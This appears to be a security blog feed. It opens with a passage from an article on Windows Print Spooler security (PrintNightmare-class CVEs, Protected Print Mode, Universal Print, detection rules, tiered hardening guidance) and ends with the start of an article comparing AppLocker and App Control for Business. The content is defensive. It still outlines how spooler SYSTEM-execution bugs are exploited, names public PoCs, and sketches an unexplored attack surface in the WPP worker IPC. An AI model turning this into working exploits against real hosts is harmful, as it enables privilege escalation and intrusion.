Universal Print is not free. It requires a Microsoft 365 / Entra ID license that includes the Universal Print entitlement. It requires network connectivity to print (the optional on-prem connector mitigates this for cached jobs; pure offline printing without the connector is not supported) [@ms-universal-print-getting-started]. It is per-user / per-printer in cost. The compatibility envelope is the IPP class driver plus the connector's translation surface; vendor-specific drivers are not part of the cloud service.

Universal Print is available in commercial Microsoft 365 tenants and, as of October 2, 2023, in the GCC and GCC High government clouds. The fundamentals page records "Universal Print is FedRamp certified by Office 365 and is now available in GCC, GCC High, and DoD environments" [@ms-universal-print-government].

The threat model Universal Print does not cover: an attacker who can reach Microsoft 365 / Entra ID tokens has cloud-side access, not local-spooler access. The PrintNightmare-class attack is moved off the endpoint; a different attack class (cloud-token compromise, mailbox compromise, OAuth phishing) takes its place. Universal Print does not, on its own, harden the surface; it relocates the surface to a cloud the customer outsources.

7.3 Head-to-Head

The trade-offs are easiest to compare in scannable form:

Aspect	Universal Print	Windows Protected Print Mode
Architectural exit	Breaks conjunct (a): no local pipe spoolss	Breaks (b) and partially (c): no third-party drivers, Spooler Worker below SYSTEM IL
Deployment model	Cloud-hosted M365 service; optional on-prem connector	Local Windows feature, GPO / Intune toggle
Driver requirement	None on client; connector translates server-side	Microsoft IPP class driver or Microsoft-signed driver; Print Support Apps as transitional
Offline support	None native; on-prem connector required	Yes (local printing continues)
License requirement	M365 / Entra ID with Universal Print entitlement	None beyond Windows 11 24H2
Threat model covered	Removes the architectural primitive from the local host	Removes third-party-driver and SYSTEM-context surfaces
Threat model NOT covered	Cloud-side token / account compromise	The RPC entry point still exists; specialty printers still require legacy stack
Default state in 2026	Opt-in (license-gated)	Opt-in (Group Policy off by default)

7.4 The Composition Pattern

WPP and Universal Print can run on the same client. A managed enterprise endpoint can use Universal Print for its enrolled shared printers (cloud-mediated) and WPP for its locally-discovered printers (driverless local stack). Microsoft's documented stance is that this composition is the long-term direction. The WPP FAQ's "at a future date" language about default-on [@ms-wpp-faq] and the third-party-driver end-of-servicing milestones [@ms-end-of-servicing] together sketch a 2027-and-after world: WPP locally, Universal Print for cloud-enrolled printers, legacy stack restricted to specialty hosts that explicitly opt out.

A complete migration to Universal Print would force every Windows user to require Microsoft 365 entitlements and continuous network connectivity to print. That is a price Microsoft has not been willing to ask the global Windows install base to pay. WPP is the answer for endpoints that print locally; Universal Print is the answer for endpoints that print to enrolled shared printers; the parallel-stack architecture is the answer to the union. As of June 2026, no Microsoft document announces a date at which the local stack will be removed.

The composed architecture in one picture:

flowchart LR subgraph EP["Managed Windows endpoint"] APP["User application"] WIN["winspool.drv"] SPL["spoolsv.exe"] WORKER["Spooler Worker
restricted token"] UPCLI["Universal Print client"] end subgraph CLD["Microsoft 365 cloud"] UPSVC["Universal Print service
MPSIPPService"] CONN["Optional on-prem connector"] end subgraph LOC["Locally discovered printers"] IPP["Mopria / IPP printer"] SPEC["Specialty printer
(opt-out path)"] end APP --> WIN WIN --> SPL SPL --> WORKER WORKER --> IPP SPL -. opt-out .-> SPEC APP --> UPCLI UPCLI --> UPSVC UPSVC --> CONN CONN --> IPP

Two answers, deliberately. We promised in section 1 that we would not tell you which one to deploy. We are keeping that promise. The next section is about why no third answer covers the gap.

8. Theoretical Limits: The Architectural Impossibility Argument

We can state the architectural-impossibility claim formally now. It is bounded, it has been bounded for fifteen years on this artifact, and it is sharp enough to act on.

8.1 The Three-Conjunct Primitive

Any local service that simultaneously satisfies three conditions exposes a SYSTEM code-execution primitive by construction:

(a) accepts low-privilege RPC,
(b) loads caller-influenced third-party DLLs as part of those requests, and
(c) runs at SYSTEM context.

The primitive is independent of any particular implementation bug. Particular implementation bugs are how the primitive is exercised. The primitive itself is what makes those bugs exploitable.

Key idea: Any local service that simultaneously accepts low-privilege RPC, loads caller-influenced DLLs, and runs at SYSTEM context exposes a SYSTEM code-execution primitive by construction. No patch on individual entry points can close the class. The class is closed only by breaking one of the three conjuncts.

The argument is not an empirical generalization. It is a structural one. Given (a), (b), and (c), the attacker's path to SYSTEM-execution is a finite search problem: enumerate the entry points that load DLLs, find one whose DLL-load arguments the attacker can steer, supply an attacker-supplied DLL. The defender's only options are to remove one of the conjuncts. Patching individual entry points moves the search problem; it does not eliminate it. The 2021-2024 patch cascade is the empirical record of that move-but-not-eliminate dynamic.

8.2 The Three Exits

Each shipped architectural approach breaks exactly one conjunct.

Break (c), the SYSTEM context. PrintIsolationHost.exe shipped in 2009 as a partial answer: drivers can run in a sibling process, but that sibling process is itself LocalSystem by default [@ms-printer-driver-isolation]. WPP's Spooler Worker (2024) is more complete: a restricted token, below SYSTEM integrity level, for the bulk of per-user spooler operations [@ms-wpp-more-info].

Break (b), the caller-influenced DLL load. WPP module blocking (2024) refuses to load anything except Microsoft-signed binaries required for IPP [@ms-wpp-more-info]. The conjunct is no longer "loads caller-influenced DLLs"; it is "loads only Microsoft-signed DLLs the OS shipped."

Break (a), the low-privilege RPC entry. Universal Print (2021) removes the local \PIPE\spoolss endpoint from the endpoint's surface [@ms-universal-print-whatis]. The CERT/CC 2021 mitigation -- stop and disable the Spooler service -- is the same architectural exit with larger collateral damage (no local printing at all) [@cert-vu-383432].

8.3 What No Exit Covers

The intersection of constraints that no shipped exit covers: specialty printers that require v3 or v4 drivers, on a host that needs offline printing, on a non-managed endpoint, in an environment that cannot adopt cloud printing. Industrial label printers, secure check printers, and healthcare imaging devices are the canonical examples [@ezeep-label-printers-wpp]. This intersection is the empirical gap that justifies the parallel-stack answer in 2026 and the absence of a default-on commitment for WPP [@ms-wpp-faq].

8.4 The Argument as a Lower Bound

The three-conjunct argument is a lower bound on bug class, not a security analysis. It says the architectural primitive cannot be made safe without breaking one of the conjuncts. It does not say that a specific implementation of an exit is itself secure. WPP could ship a bug. The Microsoft-signed module loader could have a parser vulnerability. The Spooler Worker process could be coerced into elevation through some intermediate IPC channel; that channel is itself a research question we return to in section 9.4. The architectural argument bounds what kind of bugs are still possible. It does not promise that no bugs will be.

The "service that loads caller-influenced code in a privileged context produces a privilege-escalation primitive by construction" pattern predates Windows. The capability-systems literature of the 1970s -- Hydra, KeyKOS, and the related work that gave us Mandatory Integrity Control as a Windows feature decades later -- worked through the same argument in different language. Confused-deputy attacks (the Hardy formulation) are exactly the case where a privileged process performs an operation on behalf of a less-privileged caller and the operation cashes out at the privileged process's authority. PrintNightmare is a confused-deputy primitive on `spoolsv.exe`. The architectural exits in section 5 are confused-deputy mitigations: revoke the deputy's authority (Universal Print breaks delegation entirely), confine what the deputy is willing to do (WPP module blocking), or split the deputy into a privileged broker and an unprivileged worker (WPP Spooler Worker).

Fifteen years of Print Spooler CVEs have produced a single argument with three corollaries. It is not new. It is not Microsoft's. It has been latent in the academic literature on capability systems since the 1970s. What is new in 2024 is that it shipped, in two flavors, on consumer Windows.

9. Open Problems

Three years after Microsoft shipped the architectural answer, the Print Spooler security story is not complete. We end with five open problems, presented without recommendation.

9.1 WPP Adoption Velocity Through the Opt-In Tail

No default-on commitment exists. The WPP FAQ uses the verbatim phrase "at a future date" for the default-on flip [@ms-wpp-faq]. As of June 2026, opt-in adoption is reported only anecdotally; Microsoft has not published telemetry. The three published deprecation milestones are real and dated -- January 15, 2026 (no new third-party drivers via Windows Update), July 1, 2026 (Windows IPP class driver preferred over third-party drivers for new printer installs), July 1, 2027 (third-party servicing ends except for security fixes) [@ms-end-of-servicing] -- but they do not equal "WPP is on by default."

The Lexmark vendor primary on the WPP transition spells out the operational reading from the printer-OEM perspective: "WPP is disabled by default until 2027... January 2026: no new third-party drivers published via Windows Update; July 2026: Windows defaults to IPP Class Driver when adding devices; July 2027: no updates for third-party drivers except security fixes" [@lexmark-wpp-support]. The OEMs are reading the milestones as a 2027 horizon for the default-on flip. Microsoft has not, in writing, confirmed that reading.

A negative-search finding sharpens the gap. The trade press that tracks Microsoft security launches (BleepingComputer's unveil coverage [@bleepingcomputer-wpp-unveil] and its dedicated WPP tag page [@bleepingcomputer-tag-wpp], BornCity's April 2026 Patch Tuesday print-issues report [@borncity-april-2026-patchday]), the Microsoft Tech Community discussion threads (the 2024 WPP intro discussion [@techcommunity-discuss-msec-print-4008206] and the Ignite 2024 Windows-security companion [@techcommunity-discuss-ignite-2024-4304464]), analyst output (the MPSA member eBook [@mpsa-wpp-ebook], Quocirca's vendor-published commentary [@computerweekly-quocirca-wpp]) -- none of these surface a quantitative WPP adoption number. Microsoft has not published telemetry, third-party analysts have not estimated it, and OEM disclosures cover hardware compatibility, not enterprise enablement rates. The gap is not a measurement difficulty; it is an absence in the public record.

9.2 The Specialty-Printer Gap

v3 / v4 driver printers without IPP-class compatibility still exist in production. Industrial label printers, healthcare imaging printers, secure check printers, line-printer holdouts. The honest answer is that these endpoints cannot adopt WPP and cannot adopt Universal Print and they will continue to run a legacy spooler. The defense for them is segmentation, not patching.

Print Support Apps help bridge some categories. The PSA design guide is the canonical specification [@ms-print-support-app-design-guide]. A walk through the Microsoft Store [@apps-microsoft-store-root] surfaces a sampled (not exhaustive) roster of vendor PSAs available as of June 2026: Brother's PSA was one of the first to ship [@brother-print-support-app] [@brother-support-page]; Canon Print Assistant covers Canon's IPP-everywhere subset [@canon-print-assistant-psa]; HP Smart bridges HP's IPP-everywhere set [@hp-smart-psa]; Konica Minolta's bizhub PSA covers the bizhub series [@konica-bizhub-psa]; Xerox and Lexmark co-publish a joint PSA [@xerox-lexmark-psa] [@lexmark-wpp-support]. The cloud-print intermediaries ezeep document the operational reality for the categories the PSA model does not cover: industrial label printers (Zebra, Honeywell, SATO, TSC, Dymo) speaking ZPL / EPL are absent from the Mopria-certified IPP-everywhere catalogue and from the Microsoft-Store PSA roster as of June 2026 [@ezeep-label-printers-wpp]. For those vendors the operational guidance is to keep WPP disabled on the affected workstations and to segment them off the production network.

9.3 CVE-2024-38198: Attribution and PoC Gap

No public researcher is named in any primary source for CVE-2024-38198. No public PoC exists [@wiz-cve-2024-38198] [@rapid7-cve-2024-38198]. The bug was found, patched, and remained unattributed. This is not necessarily a problem -- silent fixes are normal in vendor patch flow -- but it is a data point: the bug class is still being mined three years after the disclosure event, and the public-research apparatus has not surfaced the next finding.

Note: CVE-2024-38198, patched on August 13, 2024, has no public researcher attribution and no public PoC as of June 2026 [@wiz-cve-2024-38198] [@rapid7-cve-2024-38198]. It is the most recent named Print Spooler EoP in the public record. Its existence is the empirical proof point that the legacy spooler is still producing novel CWE-class bugs three years after PrintNightmare.

9.4 The spoolsv-to-Spooler-Worker IPC Primitive

WPP's per-user worker model introduces an IPC channel between the parent spoolsv.exe service and the Spooler Worker process [@ms-wpp-more-info]. Microsoft documents the worker's restricted token in detail (see the verbatim quote in section 6.1: "no longer runs at SYSTEM IL" [@ms-wpp-more-info] [@ms-wpp-more-info-wayback]) but does not, in public, document the IPC primitive itself. The absence is the load-bearing finding.

The Windows kernel offers at least four plausible IPC mechanisms that a service like the spooler could use to dispatch work to a per-user worker: an Advanced Local Procedure Call (ALPC) port, a named pipe (the same family \PIPE\spoolss is from), a COM activation under RPC, or a shared-memory section with notification. Each has a different attack surface. ALPC ports are not directly named in the filesystem but are reachable through documented APIs; named pipes inherit the SMB and named-pipe-anonymous policy plane [@ms-named-pipes-anonymous] [@ms-restrict-anonymous-named-pipes]; COM-RPC inherits the COM permission DACL surface; shared-memory sections inherit the section-object DACL surface. Per-user services in Windows (the per-user-services framework Microsoft introduced in 1709) typically use ALPC or named pipes for parent / worker dispatch [@ms-per-user-services]. Which mechanism WPP uses, and what authentication the parent demands of the worker (and vice versa), is the specific research question. As of June 2026 it is unanswered in the public record.

If that channel is itself coercible (TOCTOU on the IPC, redirection-style attacks on a worker named pipe), WPP may exhibit a SpoolFool-class bug at a different layer. Redirection Guard partially answers the obvious junction-following attack on the worker [@msrc-redirectionguard-blog] [@ms-redirection-trust-policy], but the worker has other IPC handles, and the worker's restricted token still has authority over operations the parent has delegated to it. No public research has surfaced an IPC-channel exploit as of June 2026. The research surface here is real and only loosely mapped.

9.5 Detection Signal Coverage for the Post-WPP Era

SigmaHQ, Splunk Security Content, Elastic, and Microsoft Defender XDR all ship rules for the PrintNightmare-era event signatures. SigmaHQ's PrintNightmare rule pack covers the PoC DLL load pattern (win_exploit_cve_2021_1675_printspooler.yml, rule ID 4e64668a-4da1-49f5-a8df-9e2d5b866718) [@sigma-cve-2021-1675-win-spooler]. The Zeek-on-the-wire DCE-RPC rule (ID 7b33baef-2a75-4ca3-9da4-34f9a15382d8) watches both MS-RPRN's RpcAddPrinterDriverEx and MS-PAR's RpcAsyncAddPrinterDriver [@sigma-cve-2021-1675-zeek]. Splunk's research-team detection on Microsoft-Windows-PrintService/Admin event code 316 (driver-add) carries the rule ID 313681a2-da8e-11eb-adad-acde48001122 and maps to MITRE ATT&CK technique T1547.012 (Print Processors) [@splunk-research-printnightmare-driver] [@splunk-printnightmare-story] [@attack-mitre-t1547-012]. Splunk's spoolsv.exe-focused rule pack adds: plug-in loading failure detection (1adc9548-da7c-11eb-8f13-acde48001122, PrintService Admin Event 808 and security log Event 4909) [@splunk-research-spoolsv-plugin-fail]; Sysmon Event ID 11 spool-folder DLL writes (347fd388-da87-11eb-836d-acde48001122) [@splunk-research-spoolsv-dll-sysmon]; Sysmon Event ID 7 loaded-modules signal on spoolsv.exe (a5e451f8-da81-11eb-b245-acde48001122) [@splunk-research-spoolsv-loaded-modules]; Sysmon Event ID 10 process-access signal on spoolsv.exe (799b606e-da81-11eb-93f8-acde48001122) [@splunk-research-spoolsv-process-access]. Elastic's prebuilt rule "Unusual Print Spooler Child Process" catches the post-exploit child-process spawn pattern (risk score 47) [@elastic-unusual-printspooler-child]. Azure Sentinel's KQL hunting query for PrintNightmare watches file creations in the print-spooler drivers folder (C:\WINDOWS\SYSTEM32\SPOOL\drivers) [@azure-sentinel-printnightmare-yaml].

Coverage for the WPP era is sparser, and the gap has a specific shape: because WPP has no in-product audit mode -- the ConfigureWindowsProtectedPrint CSP is the binary two-state setting documented in section 6.4 [@ms-policy-csp-printers] [@tenable-cis-w11-l2] -- pre-enforcement detection has to be synthesized from the existing PrintService Admin and Sysmon event signals (Event 316 driver-adds, 808 / 4909 plug-in failures, Sysmon 7 / 10 / 11 on spoolsv.exe) plus SCM service-state events (System log Event ID 7036 records spooler service start / stop transitions). Redirection Guard mitigation events appear in Microsoft-Windows-Security-Mitigations/Operational [@msrc-redirectionguard-blog]. IPC-related signals on the Spooler Worker do not have public detection content as of June 2026. The audit-without-audit-mode pattern is well understood by detection engineers running PrintNightmare content already; the synthesis work to compose it into a WPP rollout-ring playbook is the gap detection content vendors have not yet closed.

Five open problems. None of them are emergencies. All of them are reasons that a 2026 security program for Print Spooler is still a security program for Print Spooler, not an absence.

10. Practical Guide: What a Defender Does in 2026

We end with what a Windows administrator with print infrastructure should actually do in 2026. Four tiers, each with its own action list, none of them long.

10.1 Tier 1: Managed Enterprise with Cloud Workflows

For organizations already on Microsoft 365 with Entra-joined endpoints and cloud-friendly printers:

Adopt Universal Print for shared printers [@ms-universal-print-whatis] [@ms-universal-print-getting-started].
Adopt WPP on a pilot ring of managed endpoints (ConfigureWindowsProtectedPrint = 1); WPP has no in-product audit mode, so the deployment pattern is rings, not audit-then-enforce [@ms-wpp-enterprises] [@ms-policy-csp-printers] [@tenable-cis-w11-l2].
Verify Redirection Guard is enabled on spoolsv.exe [@ms-set-processmitigation] [@ms-redirection-trust-policy].
Verify the September 2021 default Point-and-Print policy is in force: RestrictDriverInstallationToAdministrators=1 [@kb-5005652-topic].

10.2 Tier 2: Managed Enterprise Without Cloud Workflows

For organizations with on-prem print infrastructure and no Universal Print appetite:

Deploy WPP to a pilot ring of managed endpoints (ConfigureWindowsProtectedPrint = 1) and watch Microsoft-Windows-PrintService/Admin for 30 or more days [@ms-wpp-enterprises] [@ms-policy-csp-printers] [@tenable-cis-server-2025-l2].
After the pilot, expand the ring to the subset of endpoints whose printers are Mopria-certified [@mopria-certified-products].
For non-Mopria printers, segment to dedicated print VLANs and enforce the September 2021 admin-only default [@kb-5005652-topic].
Verify Redirection Guard on spoolsv.exe on all spooler-bearing hosts [@msrc-redirectionguard-blog].

10.3 Tier 3: Specialty, Industrial, Regulated

For organizations whose print fleet includes specialty hardware (label printers, secure check printers, healthcare imaging):

Segment Spooler-bearing endpoints onto dedicated VLANs with restricted inbound RPC reachability [@ms-windows-firewall-overview].
Where possible, enforce the CERT/CC 2021 guidance on domain controllers (Spooler disabled); CISA's required actions for the same hosts now flow through BOD 22-01 KEV remediation after the January 2026 closure of ED 21-04, but the DC-disabled baseline is unchanged [@cert-vu-383432] [@cisa-ed-21-04].
Apply the September 2021 admin-only Point and Print default on every host [@kb-5005652-topic].
Subscribe to MSRC notifications for the affected SKUs [@msrc-cve-2021-34527].
Plan a multi-year IPP / PSA migration path; track vendor PSA availability [@brother-print-support-app] [@canon-print-assistant-psa] [@hp-smart-psa] [@konica-bizhub-psa] [@xerox-lexmark-psa] [@lexmark-wpp-support] [@ms-print-support-app-design-guide].

10.4 Tier 4: Print Server or Domain Controller Specifically

For hosts that are themselves print servers or domain controllers:

Spooler off where possible. CERT/CC's 2021 guidance remains in force; CISA closed ED 21-04 in January 2026 and folded its requirements into BOD 22-01 (KEV-catalog remediation), but the practical effect on a domain controller is unchanged [@cert-vu-383432] [@cisa-ed-21-04]. SCM service state-changes appear in the System event log under Event ID 7036 (service start / stop transitions); alert on unexpected Print Spooler Event 7036 entries on hosts where the service should remain stopped.
Where Spooler-off is impossible, isolate the host, restrict \PIPE\spoolss exposure at the firewall, and harden the named-pipe-anonymous policies (RestrictNullSessAccess = 1; spoolss absent from NullSessionPipes) [@ms-restrict-anonymous-named-pipes] [@ms-named-pipes-anonymous] [@ms-ad-firewall-ports].
Log MS-RPRN and MS-PAR calls; alert on RpcAddPrinterDriverEx and RpcAsyncAddPrinterDriver invocations from non-administrator SIDs [@sigma-cve-2021-1675-zeek]. The canonical event-log signals to instrument are: PrintService Admin Event ID 316 (driver-add) [@splunk-research-printnightmare-driver]; PrintService Admin Event ID 808 (spooler plug-in load failure) paired with security log Event ID 4909 [@splunk-research-spoolsv-plugin-fail]; Sysmon Event ID 7 (loaded modules on spoolsv.exe) [@splunk-research-spoolsv-loaded-modules]; Sysmon Event ID 10 (process access on spoolsv.exe) [@splunk-research-spoolsv-process-access]; Sysmon Event ID 11 (spool-folder DLL writes under C:\WINDOWS\SYSTEM32\SPOOL\drivers) [@splunk-research-spoolsv-dll-sysmon] [@azure-sentinel-printnightmare-yaml].
Confirm Redirection Guard is enabled on spoolsv.exe and watch Microsoft-Windows-Security-Mitigations/Operational for mitigation events [@msrc-redirectionguard-blog].

Note: CISA Emergency Directive 21-04, issued July 13, 2021, mandated that federal civilian agencies stop and disable the Print Spooler service on Active Directory domain controllers [@cisa-ed-21-04]. CISA closed ED 21-04 in January 2026 and transitioned its required actions to BOD 22-01 (Reducing the Significant Risk of Known Exploited Vulnerabilities). The compliance vehicle changed; the operational outcome did not. Agencies that have not adopted Universal Print on their DC infrastructure should still keep Spooler stopped and disabled on every DC.

For detection engineers, the named-rule packs to start from are: SigmaHQ `4e64668a-4da1-49f5-a8df-9e2d5b866718` (PrintService Admin Event 808 PoC DLL-load failure) [@sigma-cve-2021-1675-win-spooler]; SigmaHQ `7b33baef-2a75-4ca3-9da4-34f9a15382d8` (Zeek DCE-RPC wire-level driver install) [@sigma-cve-2021-1675-zeek]; Splunk story `fd79470a-da88-11eb-b803-acde48001122` (PrintNightmare analytic story, production status) [@splunk-printnightmare-story]; Splunk research `313681a2-da8e-11eb-adad-acde48001122` (PrintService Admin Event Code 316 driver-add) [@splunk-research-printnightmare-driver]; Elastic prebuilt rule "Unusual Print Spooler Child Process" (EQL, risk 47) [@elastic-unusual-printspooler-child]; Azure Sentinel hunting query `8f404352-c4ff-44d1-8d70-c50ee2fad8f8` (DeviceFileEvents in spool drivers folder) [@azure-sentinel-printnightmare-yaml]. Jacob Baines's DEF CON 29 "Bring Your Own Print Driver Vulnerability" [@defcon-29-baines-pdf] and the companion `concealed_position` repository [@baines-concealed-position] are the canonical reference for the BYOV attack class, which detection rule packs for installed-driver behavior also need to model.

The unifying pattern across the tiers: enforce the September 2021 default, enable Redirection Guard, audit WPP on the way to enforcement, and segment what cannot be migrated. The architectural answer to PrintNightmare exists. The operational answer is to use it.

11. Frequently Asked Questions

No. The press attached the name to a sequence. CVE-2021-1675 (June 8, 2021) was originally classed as a local EoP, then silently reclassified to RCE on June 21 [@nvd-cve-2021-1675] [@bleepingcomputer-domain-takeover]. CVE-2021-34527 (July 1, 2021) was the separate-bulletin out-of-band assignment for the RCE primitive Sangfor's PoC actually exploited [@nvd-cve-2021-34527] [@cert-vu-383432]. CVE-2021-34481 (July 15, 2021) was a related local EoP fixed in KB5005652 [@nvd-cve-2021-34481] [@kb-5005652-topic]. CVE-2021-36958 (September 14, 2021) was the next-cycle Print Spooler RCE [@nvd-cve-2021-36958]. Several adjacent bugs (CVE-2022-21999 SpoolFool, CVE-2024-38198) are often called "PrintNightmare-class" without being assigned the name themselves [@nvd-cve-2022-21999] [@wiz-cve-2024-38198]. The proof-of-concept that triggered the disclosure event on June 29, 2021 was written by Zhiniang Peng, Xuefeng Li, and Lewis Lee at Sangfor Technology for their Black Hat USA 2021 briefing "Diving Into Spooler" [@infocondb-bh2021-sangfor] [@afwu-wayback-snapshot]. They published it briefly believing the bug had been patched on June 8; the patch turned out to cover only the synchronous MS-RPRN entry point [@nvd-cve-2021-1675]. A second variant against the asynchronous MS-PAR `RpcAsyncAddPrinterDriver` was published shortly after by the researcher `@cube0x0` [@cube0x0-cve-2021-1675] [@cert-vu-383432]. The CERT/CC disclosure-norms advisory VU#383432 was a separate document by Will Dormann about the disclosure failure itself, not the bug [@cert-vu-383432]. No. SpoolFool (CVE-2022-21999, disclosed February 8, 2022 by Oliver Lyak / `@ly4k_` of SafeBreach Labs) is a Print Spooler local privilege escalation that abuses the printer `SpoolDirectory` registry value and NTFS reparse points, classified as CWE-59 (Link Following) [@nvd-cve-2022-21999] [@ly4k-spoolfool]. Win32k is the GUI subsystem and is uninvolved. The researcher handle is `@ly4k_` with a trailing underscore; `@jonas_lyk` is a distinct researcher. No, and it is not from March 2024 either. CVE-2024-38198 (August 13, 2024 Patch Tuesday) is a Print Spooler Elevation of Privilege Vulnerability classified as CWE-345 Insufficient Verification of Data Authenticity [@wiz-cve-2024-38198] [@rapid7-cve-2024-38198]. Exploitation requires winning a race, but the CWE is 345, not 362, and Microsoft did not name Point and Print as the affected component. CVSS v3.1 base 7.5 (`AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H`) [@wiz-cve-2024-38198]. No public PoC and no public researcher attribution exist as of June 2026. Because the third-party printer-driver install base assumes drivers are loaded into a LocalSystem-context process. Sandboxing the spooler would break compatibility with the v3 and v4 driver model that the entire pre-2024 printer install base ships against [@ms-printer-driver-isolation] [@ms-print-spooler-architecture]. Microsoft's chosen architectural exits (Windows Protected Print Mode and Universal Print) sidestep the constraint by either restricting which DLLs the spooler will load (WPP module blocking plus the lower-privilege Spooler Worker) or removing the local spooler from the workflow entirely (Universal Print) [@ms-wpp-more-info] [@ms-wpp-canonical] [@ms-universal-print-whatis]. For endpoints that print only through Universal Print and where the local Spooler service is disabled, yes. The `\PIPE\spoolss` RPC entry point is not exposed and the architectural primitive is broken [@ms-universal-print-whatis] [@ms-universal-print-getting-started]. Most enterprise deployments are mixed (Universal Print for some workflows, local Spooler for others), in which case the PrintNightmare risk surface is reduced but not eliminated. Universal Print does not automatically disable the local Spooler. We can find no record of one. The Sangfor "Diving Into Spooler" talk on August 4, 2021 at Black Hat USA 2021 is the canonical primary-source talk for the technique [@infocondb-bh2021-sangfor]. Jacob Baines's DEF CON 29 (August 2021) talk "Bring Your Own Print Driver Vulnerability" is a related contemporary talk worth citing if you have heard the Giakouminakis attribution and are trying to track down its source [@defcon-29-baines-pdf] [@baines-concealed-position]. The Sangfor Black Hat USA 2021 session record (presenters, time, abstract) is preserved on InfoconDB at `infocondb.org/con/black-hat/black-hat-usa-2021/diving-into-spooler-discovering-lpe-and-rce-vulnerabilities-in-windows-printer` [@infocondb-bh2021-sangfor]. Jacob Baines's DEF CON 29 slides are mirrored at `media.defcon.org/DEF CON 29/DEF CON 29 presentations/Jacob Baines - Bring Your Own Print Driver Vulnerability.pdf` [@defcon-29-baines-pdf], and the companion `concealed_position` GitHub repository documents the four-CVE driver exploit set (ACIDDAMAGE / RADIANTDAMAGE / POISONDAMAGE / SLASHINGDAMAGE) [@baines-concealed-position].

AppLocker vs App Control for Business: Two Locks on the Same Door, and Why Windows Still Ships Both in 2026

noreply@paragmali.com (Parag Mali) — Mon, 01 Jun 2026 00:00:00 GMT

Windows ships two application-control systems in parallel in 2026: **AppLocker**, a per-user policy evaluator that lives in the user-mode Application Identity service, and **App Control for Business** (still widely called WDAC), a kernel policy evaluator built into `ci.dll`. Microsoft itself states that AppLocker *"doesn't meet the servicing criteria for being a security feature"* while App Control was *designed* as one under the MSRC servicing criteria. That single sentence explains why both still ship. AppLocker handles per-user policy on devices that have no code-signing PKI. App Control, with a signed policy and HVCI on, is the only configuration that survives an admin-equivalent attacker. This article walks the architecture of each, the structural ceilings of both, the role of ISG and the Recommended Block Rules, and the five-question decision tree for picking between them in 2026.

1. Two Locks on the Same Door

Sit down on a Windows 11 24H2 device in 2026. Open gpedit.msc. Navigate to Computer Configuration -> Windows Settings -> Security Settings, and you will find a node called AppLocker, with five rule collections waiting to be populated. Now walk one branch over to Computer Configuration -> Administrative Templates -> System -> Device Guard. That node, despite the obsolete name in the GPO tree, is where you author policy for what Microsoft now calls App Control for Business [@ms-appcontrol-applocker-overview] -- the same kernel-enforced application-control engine that has been renamed twice since launch (Configurable Code Integrity in 2015, Windows Defender Application Control in 2017, App Control for Business in 2024) [@ms-blog-introducing-wdac-2017] but never replaced.

Two completely separate policy nodes. Two completely separate deployment surfaces. Two completely separate enforcement architectures. Both shipping in the same SKU on the same device in 2026. Both documented as currently supported on Microsoft Learn [@ms-appcontrol-applocker-overview]. Which one is "the right one"? The honest answer turns out to be neither, and both, and the reason is a single sentence on a single Microsoft Learn page that draws a line between security feature and operational hygiene control sharper than most practitioners realise.

A policy mechanism that decides, at process-launch or image-load time, whether a given binary, script, or installer is allowed to execute on a Windows device. An application-control policy is an enumerated set of allow rules (an allowlist), deny rules (a blocklist), or both. The decision is made by an OS-resident evaluator before the binary's main entry point runs.

Microsoft's own App Control and AppLocker Overview page makes the line explicit. AppLocker [@ms-appcontrol-applocker-overview], in Microsoft's own words, "helps to prevent end-users from running unapproved software on their computers but doesn't meet the servicing criteria for being a security feature." App Control for Business, in contrast, was "designed as a security feature under the servicing criteria, defined by the Microsoft Security Response Center" [@ms-appcontrol-applocker-overview]. The MSRC servicing criteria are not marketing copy. They are the rule that decides whether a defect in a Windows feature gets a CVE [@msrc-servicing-criteria]. AppLocker bypasses do not get CVEs. App Control bypasses, with the right configuration, do.

flowchart LR Root["Computer Configuration"] Sec["Windows Settings"] Adm["Administrative Templates"] SecSet["Security Settings"] Sys["System"] AL["AppLocker node
(user-mode AppIDSvc)"] DG["Device Guard node
(kernel ci.dll / App Control for Business)"] Root --> Sec Root --> Adm Sec --> SecSet SecSet --> AL Adm --> Sys Sys --> DG

The rest of this article pays off that one sentence. The first half walks the architecture of each system at the level of who evaluates what, where in the operating system, and against which attacker. The second half makes the practitioner decision tractable: which one to deploy in 2026, what to pair it with, and what no allowlist of any generation can do.

Key idea: AppLocker and App Control for Business are not two generations of the same product. They are two different products solving two different problems. AppLocker is an operational hygiene control whose enforcement Microsoft itself disclaims as a security boundary. App Control for Business, when its policy is signed by the deploying organisation and HVCI is on, is the security boundary. Both still ship because neither is a strict superset of the other.

If both are shipping and both are recommended in different Microsoft Learn pages, what exactly does each one do? And why is the line between them drawn in Microsoft's servicing criteria rather than in its feature inventory? To answer that, we have to start before either product existed.

2. Pre-History -- Why an OS Needs Application Control at All

The 1999-2001 macro-virus and worm era -- ILOVEYOU [@cert-ca-2000-04-iloveyou], Code Red [@cert-ca-2001-19-codered], Nimda [@cert-ca-2001-26-nimda] -- made it unsurvivable for Windows to trust any binary the user had Execute permission on. The default behaviour of a Windows desktop in that era was: if the bits are on disk and the user can read them, they run. There was no per-binary policy gate. The OS-level answer Microsoft shipped in October 2001 was Software Restriction Policies, an XP RTM feature documented at length the following year by John Lambert at Virus Bulletin 2002 [@vb2002-srp].

The user-mode Windows API (`WinSafer*`) that SRP used to evaluate a candidate executable against the configured rule set. The SAFER evaluator returned one of three security levels -- `Disallowed`, `Basic User`, or `Unrestricted` -- on each `CreateProcess`. The decision lived entirely in user mode, in the same address space as the loader, which is the architectural defect AppLocker partially inherited and App Control later corrected.

SRP supported five rule conditions [@ms-applocker-what-is]: hash, certificate, path, Internet zone, and registry path. Each condition tested a candidate file against an administrator-authored allow or deny rule, returning a SAFER security level that the user-mode evaluator honoured at CreateProcess. The model was right: a per-machine GPO-administered policy evaluated against a defined file taxonomy.

The Microsoft code-signing format that binds a publisher identity (an X.509 certificate chain) to a PE binary via a cryptographic signature embedded in the binary's optional header. Authenticode is the *plumbing* every Windows application-control system uses to answer the question "who published this binary?" -- but it cannot answer "what will this binary do once it runs?". Authenticode mechanics are out of scope here; the companion Authenticode article covers them in full.

